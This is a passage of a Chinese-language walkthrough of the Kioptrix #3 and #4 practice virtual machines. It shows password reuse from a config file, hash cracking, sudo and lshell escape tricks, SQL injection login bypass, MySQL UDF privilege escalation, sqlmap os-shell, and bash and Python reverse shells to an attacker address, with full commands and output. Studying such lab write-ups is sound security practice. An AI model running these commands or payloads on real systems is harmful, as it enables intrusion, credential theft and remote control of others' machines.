	// Do NOT include a trailing forward slash

	$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

	$GLOBALS["gallarific_mysql_server"] = "localhost";
	$GLOBALS["gallarific_mysql_database"] = "gallery";
	$GLOBALS["gallarific_mysql_username"] = "root";
	$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

	// Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
		echo("A connection to the database couldn't be established: " . mysql_error());
		die();
}else {
	if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
		echo("The Gallarific database couldn't be opened: " . mysql_error());
		die();
	}else {
		$settings=mysql_query("select * from gallarific_settings");
		if(mysql_num_rows($settings)!=0){
			while($data=mysql_fetch_array($settings)){
				$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
			}
		}
	
	}
}

?>

mysql本地登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
$ mysql -u root -p
mysql -u root -p
Enter password: fuckeyou

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| gallery            | 
| mysql              | 
+--------------------+
3 rows in set (0.00 sec)

mysql> use gallery;
use gallery;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+----------------------+
| Tables_in_gallery    |
+----------------------+
| dev_accounts         | 
| gallarific_comments  | 
| gallarific_galleries | 
| gallarific_photos    | 
| gallarific_settings  | 
| gallarific_stats     | 
| gallarific_users     | 
+----------------------+
7 rows in set (0.00 sec)

mysql> select * from dev_accounts;
select * from dev_accounts;
+----+------------+----------------------------------+
| id | username   | password                         |
+----+------------+----------------------------------+
|  1 | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 | 
|  2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e | 
+----+------------+----------------------------------+
2 rows in set (0.10 sec)

phpmydamin登录

得到root fuckeyou,phpmyadmin成功登录

找到dev_accounts表中的两个字段,猜测是dregloneferret用户的登录密码

dreg 0d3eccfb887aabd50f243b3f155c0f85

loneferret 5badcaf789d3d1d09794d8f021f40f0e

iwLhqO.png

md5解密得到loneferret的密码为starwars

ssh登录提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
root@kali:~/Desktop# ssh loneferret@192.168.214.140
The authenticity of host '192.168.214.140 (192.168.214.140)' can't be established.
RSA key fingerprint is SHA256:NdsBnvaQieyTUKFzPjRpTVK6jDGM/xWwUi46IR/h1jU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.214.140' (RSA) to the list of known hosts.
loneferret@192.168.214.140's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)

登录成功,执行sudo -l

1
2
3
4
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht

能执行之前提到的sudo ht命令

1
2
loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.

报错,是显示颜色的问题,执行export TERM=xterm

1
2
3
4
5
loneferret@Kioptrix3:~# echo $TERM
xterm-256color
loneferret@Kioptrix3:~# export TERM=xterm
loneferret@Kioptrix3:~# echo $TERM
xterm

然后就能正常运行sudo ht命令,ht是个编辑器,sudo ht就能以root权限修改一些文件来提权

修改/etc/passwd

F3打开/etc/passwd文件,将当前用户uid改为0(root权限),保存退出,重新ssh登录后就能得到root权限

iwLfsK.png

修改/etc/sudoers

修改当前用户允许sudo使用的命令,加上个bash,得到root权限

1
2
3
4
5
6
7
8
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
    (root) NOPASSWD: /bin/bash
loneferret@Kioptrix3:~$ sudo bash
root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)

iwLWM6.png

或者直接改为loneferret ALL=(ALL) ALL获得sudo执行所有命令的权限

iwL7id.png

1
2
3
4
5
6
7
loneferret@Kioptrix3:~$ sudo -l
[sudo] password for loneferret: 
User loneferret may run the following commands on this host:
    (ALL) ALL
loneferret@Kioptrix3:~$ sudo su
root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)

其他的

在网站的/gallery的站点名是Gallarifc,搜索下发现存在sql注入漏洞
https://www.exploit-db.com/exploits/15891/

iwLHJA.png

可以直接sql注入拿到用户的密码

Kioptrix#4

  • 靶机 ip 192.168.214.142
  • kali ip 192.168.214.139

nmap扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
root@kali:~# nmap -sS -A 192.168.214.142 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-23 08:43 EDT
Nmap scan report for 192.168.214.142
Host is up (0.00024s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:12:42:B6 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 10h00m01s, deviation: 2h49m43s, median: 8h00m00s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2018-10-23T16:43:33-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.214.142

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.05 seconds

可以看到开启了22,80,139,445端口,也能扫描到smb的版本号,搜了下没发现有能利用的漏洞

打开主页,是一个用户登陆的界面,先尝试了下admin等弱口令和万能密码

当输入账号密码错误时提示

isB6aT.png

密码使用admin'or'1'='1

isBcIU.png

能看到是登陆成功,但没有admin这个账户

在以上测试的时候我同时使用了dirbuster来扫目录,发现了johnrobert这两个目录和php页面,我猜大概是用户,尝试登录,成功,显示出账号和密码

1
2
3
4
5
Username	:	john
Password	:	MyNameIsJohn

Username	:	robert
Password	:	ADGAdsafdfwt4gadfga==

尝试ssh登录,成功

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~/Desktop# ssh john@192.168.214.143
The authenticity of host '192.168.214.143 (192.168.214.143)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.214.143' (RSA) to the list of known hosts.
john@192.168.214.143's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$

但给的shell不是一般的shell,限制了只能使用cd clear echo exit help ll lpath ls这些命令

搜索发现这个叫做Lshell https://www.aldeid.com/wiki/Lshell

echo os.system('/bin/bash')绕过lshell的限制获取bash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
john@Kioptrix4:~$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
john@Kioptrix4:~$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 8.04.3 LTS
Release:	8.04
Codename:	hardy

查看网站根目录下页面的源码,能发现数据库的用户密码

1
2
3
4
5
6
7
8
john@Kioptrix4:/var/www$ cat checklogin.php 
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

给的是mysql的root用户,尝试利用udf来提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
john@Kioptrix4:~$ mysql -uroot
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
ERROR 1125 (HY000): Function 'sys_exec' already exists

发现已经存在sys_exec函数,直接利用,将当前用户加到管理组里

老版本linux例外

1
2
3
4
5
6
7
8
9
You can create a new user simply using the adduser(8) command.

To make it a user capable of performing sudo, add him to the sudo group using either of the following commands:

sudo usermod -a -G sudo <username>
sudo adduser <username> sudo
This works because the sudo group is predefined in /etc/sudoers. Note though that older versions of Ubuntu will use admin as group instead:

Until Ubuntu 11.10, the Unix group for administrators with root privileges through sudo had been admin. Starting with Ubuntu 12.04 LTS, it is now sudo, for compatibility with Debian and sudo itself. However, for backwards compatibility, admin group members are still recognized as administrators

执行提权命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.08 sec)

mysql> quit
Bye
john@Kioptrix4:~$ sudo -s
[sudo] password for john: 
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
root:~$ id
*** unknown command: id
root:~$ 
root:~$ quit
john@Kioptrix4:~$ sudo su
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
  • 另一种思路

登陆页面存在sql注入,就可以利用sqlmap

1
2
python sqlmap.py -u http://192.168.214.143/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login"
-p mypassword --os-shell

这样就获取到一个webshell,也可以继续反弹shell

在这里遇到了问题,一直反弹shell不成功,自己写个一句话木马也不成功

在ssh登陆后的真实shell试,竟然也不成功,发现是系统的问题,没有/dev/tcp这个文件。。。不过python可以用

1
2
root@Kioptrix4:/dev# bash -i >& /dev/tcp/192.168.214.139/7777 0>&1
bash: /dev/tcp/192.168.214.139/7777: No such file or directory
1
2
os-shell> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.214.139",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
do you want to retrieve the command standard output? [Y/n/a] y

而一句话写不进去是因为没有权限,sqlmap写的一句话应该是利用mysql的权限写的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@kali:~# nc -lvvp 7777
listening on [any] 7777 ...
192.168.214.143: inverse host lookup failed: Unknown host
connect to [192.168.214.139] from (UNKNOWN) [192.168.214.143] 35105
/bin/sh: can't access tty; job control turned off
$ ls -al
total 76
drwxr-xr-x  5 root root 4096 Oct 24 17:58 .
drwxr-xr-x 14 root root 4096 Feb  4  2012 ..
-rw-r--r--  1 root root 1477 Feb  6  2012 checklogin.php
-rw-r--r--  1 root root  298 Feb  4  2012 database.sql
drwxr-xr-x  2 root root 4096 Feb  6  2012 images
-rw-r--r--  1 root root 1255 Feb  6  2012 index.php
drwxr-xr-x  2 root root 4096 Feb  4  2012 john
-rw-r--r--  1 root root  176 Feb  4  2012 login_success.php
-rw-r--r--  1 root root   78 Feb  4  2012 logout.php
-rw-r--r--  1 root root  606 Feb  6  2012 member.php
drwxr-xr-x  2 root root 4096 Feb  4  2012 robert
-rw-rw-rw-  1 root root  927 Oct 24 17:58 tmpbdges.php
$ touch a.php
touch: cannot touch `a.php': Permission denied